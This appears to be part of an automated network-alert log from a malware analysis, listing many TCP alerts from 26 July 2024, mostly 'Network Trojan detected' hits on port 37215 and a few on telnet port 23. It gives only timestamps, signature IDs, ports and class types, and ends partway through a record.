                Timestamp:2024-07-26T17:42:23.045155+0200
                SID:2835222
                Source Port:51376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:23.195780+0200
                SID:2835222
                Source Port:53334
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:24.485053+0200
                SID:2835222
                Source Port:50588
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:03.751950+0200
                SID:2835222
                Source Port:52678
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:23.159195+0200
                SID:2835222
                Source Port:56174
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:00.381780+0200
                SID:2008230
                Source Port:59728
                Destination Port:23
                Protocol:TCP
                Classtype:Misc activity
                Timestamp:2024-07-26T17:42:03.752078+0200
                SID:2835222
                Source Port:46410
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:34.316507+0200
                SID:2835222
                Source Port:37604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:03.751909+0200
                SID:2835222
                Source Port:40288
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:02.605212+0200
                SID:2835222
                Source Port:50232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:34.311470+0200
                SID:2835222
                Source Port:47850
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:22.866774+0200
                SID:2835222
                Source Port:51484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:32.175180+0200
                SID:2835222
                Source Port:52136
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:10.506106+0200
                SID:2835222
                Source Port:43070
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:46.315845+0200
                SID:2835222
                Source Port:56736
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:40.393104+0200
                SID:2835222
                Source Port:50290
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:22.988596+0200
                SID:2835222
                Source Port:45118
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:24.228000+0200
                SID:2835222
                Source Port:33256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:51.609205+0200
                SID:2835222
                Source Port:39730
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:52.052390+0200
                SID:2835222
                Source Port:38158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:06.886909+0200
                SID:2835222
                Source Port:57356
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:00.341021+0200
                SID:2008230
                Source Port:13638
                Destination Port:23
                Protocol:TCP
                Classtype:Misc activity
                Timestamp:2024-07-26T17:42:24.803633+0200
                SID:2835222
                Source Port:52288
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:38.336981+0200
                SID:2835222
                Source Port:54634
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:38.393500+0200
                SID:2835222
                Source Port:58204
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:00.299767+0200
                SID:2835222
                Source Port:35614
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:10.501410+0200
                SID:2835222
                Source Port:51934
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:23.591388+0200
                SID:2835222
                Source Port:55052
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:24.287799+0200
                SID:2835222
                Source Port:40974
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:00.563591+0200
                SID:2835222
                Source Port:34452
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:24.297544+0200
                SID:2835222
                Source Port:45464
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:24.463324+0200
                SID:2835222
                Source Port:41628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:22.893675+0200
                SID:2835222
                Source Port:57192
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:38.375828+0200
                SID:2835222
                Source Port:41572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:54.174469+0200
                SID:2835222
                Source Port:57340
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:35.406729+0200
                SID:2835222
                Source Port:41346
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:03.751947+0200
                SID:2835222
                Source Port:45872
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:22.812855+0200
                SID:2835222
                Source Port:48976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:22.853896+0200
                SID:2835222
                Source Port:37094
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:38.336977+0200
                SID:2835222
                Source Port:40692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:56.988818+0200
                SID:2835222
                Source Port:36470
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:00.506913+0200
                SID:2835222
                Source Port:54954
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:24.454733+0200
                SID:2835222
                Source Port:45774
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:06.797400+0200
                SID:2835222
                Source Port:38180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:23.616440+0200
                SID:2835222
                Source Port:38512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:51.608904+0200
                SID:2835222
                Source Port:45206
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:21.678989+0200
                SID:2835222
                Source Port:34350
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:27.586204+0200
                SID:2835222
                Source Port:54582
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:24.357902+0200
                SID:2835222
                Source Port:40668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:38.401646+0200
                SID:2835222
                Source Port:36440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:54.101696+0200
                SID:2835222
                Source Port:52118
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:23.237927+0200
                SID:2835222
                Source Port:44838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:30.815681+0200
                SID:2835222
                Source Port:47692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:22.970194+0200
                SID:2835222
                Source Port:47498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:00.441812+0200
                SID:2835222
                Source Port:48398
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:23.617803+0200
                SID:2835222
                Source Port:60478
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:10.648359+0200
                SID:2835222
                Source Port:57998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:22.985864+0200
                SID:2835222
                Source Port:45838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:22.879542+0200
                SID:2835222
                Source Port:54202
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:32.380501+0200
                SID:2835222
                Source Port:33682
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:44.271157+0200
                SID:2835222
                Source Port:40282
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:44.231489+0200
                SID:2835222
                Source Port:36950
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:16.840046+0200
                SID:2835222
                Source Port:58144
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:24.521300+0200
                SID:2835222
                Source Port:47268
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:56.990565+0200
                SID:2835222
                Source Port:46396
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:22.943465+0200
                SID:2835222
                Source Port:51934
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:45.304300+0200
                SID:2835222
                Source Port:50628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:23.056769+0200
                SID:2835222
                Source Port:60020
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:27.003689+0200
                SID:2835222
                Source Port:39788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:22.856108+0200
                SID:2835222
                Source Port:38494
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:24.287422+0200
                SID:2835222
                Source Port:59572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:40.497702+0200
                SID:2835222
                Source Port:33334
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:03.751870+0200
                SID:2835222
                Source Port:38798
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:22.896586+0200
                SID:2835222
                Source Port:37812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:24.511474+0200
                SID:2835222
                Source Port:53334
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:03.751998+0200
                SID:2835222
                Source Port:51668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:24.509979+0200
                SID:2835222
                Source Port:35848
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:52.051540+0200
                SID:2835222
                Source Port:34816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:22.831517+0200
                SID:2835222
                Source Port:53840
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:52.052769+0200
                SID:2835222
                Source Port:56188
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:24.287552+0200
                SID:2835222
                Source Port:48798
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:24.511473+0200
                SID:2835222
                Source Port:52884
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:23.645944+0200
                SID:2835222
                Source Port:47750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:24.323922+0200
                SID:2835222
                Source Port:52422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:29.172763+0200
                SID:2835222
                Source Port:36304
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:38.336975+0200
                SID:2835222
                Source Port:41866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:22.856279+0200
                SID:2835222
                Source Port:57540
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:03.752000+0200
                SID:2835222
                Source Port:43686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:03.751871+0200
                SID:2835222
                Source Port:48516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:24.352835+0200
                SID:2835222
                Source Port:57230
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:32.923394+0200
                SID:2835222
                Source Port:48880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:21.924166+0200
                SID:2835222
                Source Port:51394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:41.860069+0200
                SID:2835222
                Source Port:42826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:38.375735+0200
                SID:2835222
                Source Port:38392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:38.337658+0200
                SID:2835222
                Source Port:57862
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:25.234586+0200
                SID:2835222
                Source Port:47738
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:26.508819+0200
                SID:2835222
                Source Port:48122
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:03.752081+0200
                SID:2835222
                Source Port:59454
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:24.327040+0200
                SID:2835222
                Source Port:51338
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:24.317690+0200
                SID:2835222
                Source Port:50894
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:56.988003+0200
                SID:2835222
                Source Port:45048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:52.053882+0200
                SID:2835222
                Source Port:54102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:10.503975+0200
                SID:2835222
                Source Port:60342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:34.473036+0200
                SID:2835222
                Source Port:55592
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:40.528872+0200
                SID:2835222
                Source Port:36408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:10.556508+0200
                SID:2835222
                Source Port:40060
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:56.991371+0200
                SID:2835222
                Source Port:48918
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:22.977233+0200
                SID:2835222
                Source Port:53646
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:06.795826+0200
                SID:2835222
                Source Port:33162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:23.275321+0200
                SID:2835222
                Source Port:40738
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:26.999031+0200
                SID:2835222
                Source Port:34206
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:40.663101+0200
                SID:2835222
                Source Port:50998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:30.815346+0200
                SID:2835222
                Source Port:58070
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:04.601850+0200
                SID:2835222
                Source Port:43146
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:22.506796+0200
                SID:2835222
                Source Port:55322
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:22.894237+0200
                SID:2835222
                Source Port:37816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:56.988812+0200
                SID:2835222
                Source Port:40378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:32.175998+0200
                SID:2835222
                Source Port:41284
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:24.179275+0200
                SID:2835222
                Source Port:58530
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:22.892910+0200
                SID:2835222
                Source Port:39182
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:32.159241+0200
                SID:2835222
                Source Port:36006
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:06.728070+0200
                SID:2835222
                Source Port:37862
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:24.256725+0200
                SID:2835222
                Source Port:53276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:45.674969+0200
                SID:2835222
                Source Port:47514
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:30.726500+0200
                SID:2835222
                Source Port:43828
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:23.149205+0200
                SID:2835222
                Source Port:45156
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:38.992663+0200
                SID:2835222
                Source Port:50404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:32.157918+0200
                SID:2835222
                Source Port:34942
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:31.133457+0200
                SID:2835222
                Source Port:41312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:38.992660+0200
                SID:2835222
                Source Port:42074
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:03.751876+0200
                SID:2835222
                Source Port:35368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:22.901005+0200
                SID:2835222
                Source Port:52838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:03.751875+0200
                SID:2835222
                Source Port:41296
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:24.287043+0200
                SID:2835222
                Source Port:47232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:37.553275+0200
                SID:2835222
                Source Port:53918
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:22.988543+0200
                SID:2835222
                Source Port:48602
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:24.287214+0200
                SID:2835222
                Source Port:45746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:33.140380+0200
                SID:2835222
                Source Port:46256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:00.381794+0200
                SID:2835222
                Source Port:45352
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:24.301117+0200
                SID:2835222
                Source Port:35388
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:22.882411+0200
                SID:2835222
                Source Port:44616
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:24.287856+0200
                SID:2835222
                Source Port:48258
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:58.929134+0200
                SID:2835222
                Source Port:54730
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:22.939719+0200
                SID:2835222
                Source Port:35580
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:22.851199+0200
                SID:2835222
                Source Port:56802
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:23.602210+0200
                SID:2835222
                Source Port:43328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:54.108108+0200
                SID:2835222
                Source Port:57108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:27.150044+0200
                SID:2835222
                Source Port:35532
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:24.294250+0200
                SID:2835222
                Source Port:48372
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:24.314164+0200
                SID:2835222
                Source Port:54158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:00.683809+0200
                SID:2835222
                Source Port:40098
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:02.508884+0200
                SID:2835222
                Source Port:60630
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:23.545202+0200
                SID:2835222
                Source Port:50666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:24.315912+0200
                SID:2835222
                Source Port:47652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:12.316377+0200
                SID:2835222
                Source Port:43596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:24.642635+0200
                SID:2835222
                Source Port:57276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:22.900619+0200
                SID:2835222
                Source Port:53240
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:38.373747+0200
                SID:2835222
                Source Port:52500
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:52.051589+0200
                SID:2835222
                Source Port:53596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:19.217704+0200
                SID:2835222
                Source Port:58464
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:24.287386+0200
                SID:2835222
                Source Port:52368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:03.751962+0200
                SID:2835222
                Source Port:35630
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:30.737301+0200
                SID:2835222
                Source Port:42754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:40.413453+0200
                SID:2835222
                Source Port:55800
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:22.545985+0200
                SID:2835222
                Source Port:40954
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:06.849990+0200
                SID:2835222
                Source Port:45576
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:03.751791+0200
                SID:2835222
                Source Port:49236
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:38.374387+0200
                SID:2835222
                Source Port:55604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:46.352590+0200
                SID:2835222
                Source Port:43118
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:03.752001+0200
                SID:2835222
                Source Port:53628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:23.195595+0200
                SID:2835222
                Source Port:53312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:35.371539+0200
                SID:2835222
                Source Port:44732
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:40.508501+0200
                SID:2835222
                Source Port:38608
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:04.722046+0200
                SID:2835222
                Source Port:35848
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:23.375667+0200
                SID:2835222
                Source Port:49070
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:10.559828+0200
                SID:2835222
                Source Port:52402
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:06.644205+0200
                SID:2835222
                Source Port:36036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:22.944107+0200
                SID:2835222
                Source Port:49132
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:23.054845+0200
                SID:2835222
                Source Port:43642
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:22.963256+0200
                SID:2835222
                Source Port:59738
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:26.551133+0200
                SID:2835222
                Source Port:46002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:32.154781+0200
                SID:2835222
                Source Port:56376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:24.287467+0200
                SID:2835222
                Source Port:34038
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:24.287595+0200
                SID:2835222
                Source Port:33722
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:32.173820+0200
                SID:2835222
                Source Port:37874
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:33.042697+0200
                SID:2835222
                Source Port:38730
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:51.609064+0200
                SID:2835222
                Source Port:50856
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:32.317143+0200
                SID:2835222
                Source Port:55208
